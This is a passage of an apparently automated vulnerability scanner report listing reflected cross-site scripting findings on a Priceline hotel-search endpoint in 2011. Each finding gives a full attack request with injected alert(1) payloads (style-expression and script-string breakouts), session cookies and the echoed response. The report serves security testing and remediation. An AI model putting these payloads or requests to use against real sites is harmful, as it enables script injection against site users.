4.142. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the session_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad165"style%3d"x%3aexpression(alert(1))"b5f07388fd31c4bf1 was submitted in the session_key parameter. This input was echoed as ad165"style="x:expression(alert(1))"b5f07388fd31c4bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334ad165"style%3d"x%3aexpression(alert(1))"b5f07388fd31c4bf1&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:18 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001218c8e011572625; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A18&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:18 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="session_key" value="711510AC721510AC20111003000909914181269334ad165"style="x:expression(alert(1))"b5f07388fd31c4bf1"/>
...[SNIP]...

4.143. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the starRating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6371a"style%3d"x%3aexpression(alert(1))"d300b6f357f325257 was submitted in the starRating parameter. This input was echoed as 6371a"style="x:expression(alert(1))"d300b6f357f325257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-16371a"style%3d"x%3aexpression(alert(1))"d300b6f357f325257&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:30 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001730c0e011714163; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A30&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8953
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="starRating" value="-16371a"style="x:expression(alert(1))"d300b6f357f325257"/>
...[SNIP]...

4.144. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the starRating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b77"style%3d"x%3aexpression(alert(1))"22c15fa7b0d was submitted in the starRating parameter. This input was echoed as f9b77"style="x:expression(alert(1))"22c15fa7b0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1f9b77"style%3d"x%3aexpression(alert(1))"22c15fa7b0d&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:34 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5064010a2011100300433400e011599071; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A34&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:34 GMT; Path=/
Set-Cookie: JSESSIONID=530B681A81D3E82EF77300F8F6A759C0; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8703
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="starRating" value="-1f9b77"style="x:expression(alert(1))"22c15fa7b0d"/>
...[SNIP]...

4.145. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkInDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcfce"%3balert(1)//d87c20a00bf was submitted in the checkInDate parameter. This input was echoed as bcfce";alert(1)//d87c20a00bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 385
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A7DD4F28603939D582AC0D4191CEC727; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL

passingValues=YES&affiliateSubID=514A&checkInDate=bcfce"%3balert(1)//d87c20a00bf&hotelBrand=&checkOutDate=10%2F16%2F2011&refclickid=TRIP_HOTELSEARCH&cityName=bos&numberOfRooms=1&jsk=4663010a5564010a20111003003755e18011569968&searchType=CITY&plf=pclh&searchHotelName=&starRating=-1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:51:53 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A7E2B67ED1A3C415919522B4994E7029; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298438
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
= "A";
c2c["gblPartnerCode"] = "PCLN";
c2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResults_default";
c2c["numRooms"] = "1";
c2c["travelEndDate"] = "10/16/2011";
c2c["travelStartDate"] = "bcfce";alert(1)//d87c20a00bf";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...

4.146. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11670"style%3d"x%3aexpression(alert(1))"1aa8d5a4c6c was submitted in the checkInDate parameter. This input was echoed as 11670"style="x:expression(alert(1))"1aa8d5a4c6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 385
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A7DD4F28603939D582AC0D4191CEC727; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL

passingValues=YES&affiliateSubID=514A&checkInDate=11670"style%3d"x%3aexpression(alert(1))"1aa8d5a4c6c&hotelBrand=&checkOutDate=10%2F16%2F2011&refclickid=TRIP_HOTELSEARCH&cityName=bos&numberOfRooms=1&jsk=4663010a5564010a20111003003755e18011569968&searchType=CITY&plf=pclh&searchHotelName=&starRating=-1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:51:43 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Length: 298738
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkInDate" name="checkInDate" size="12" value="11670"style="x:expression(alert(1))"1aa8d5a4c6c" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...

4.147. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkOutDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16597"%3balert(1)//918d3a74d54 was submitted in the checkOutDate parameter. This input was echoed as 16597";alert(1)//918d3a74d54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=16597"%3balert(1)//918d3a74d54&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHot
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:28 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=9B81E2B82836B27C1F2948661BC0EF08; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298494
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
] = "HOTELSEARCH";
c2c["serverDomain"] = "A";
c2c["gblPartnerCode"] = "PCLN";
c2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResults_default";
c2c["numRooms"] = "1";
c2c["travelEndDate"] = "16597";alert(1)//918d3a74d54";
c2c["travelStartDate"] = "10/04/2011";
c2c["vid"] = "v2011100300090989417126";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...

4.148. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5ec"style%3d"x%3aexpression(alert(1))"00e29997f67 was submitted in the checkOutDate parameter. This input was echoed as df5ec"style="x:expression(alert(1))"00e29997f67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=df5ec"style%3d"x%3aexpression(alert(1))"00e29997f67&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHot
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:17 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D74CAC1CB0F684F7A50FF3C7A87EFE5A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298794
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkOutDate" name="checkOutDate" size="12" value="df5ec"style="x:expression(alert(1))"00e29997f67" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...

4.149. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0c98"%3balert(1)//acb6c7dcc1f was submitted in the key parameter. This input was echoed as b0c98";alert(1)//acb6c7dcc1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
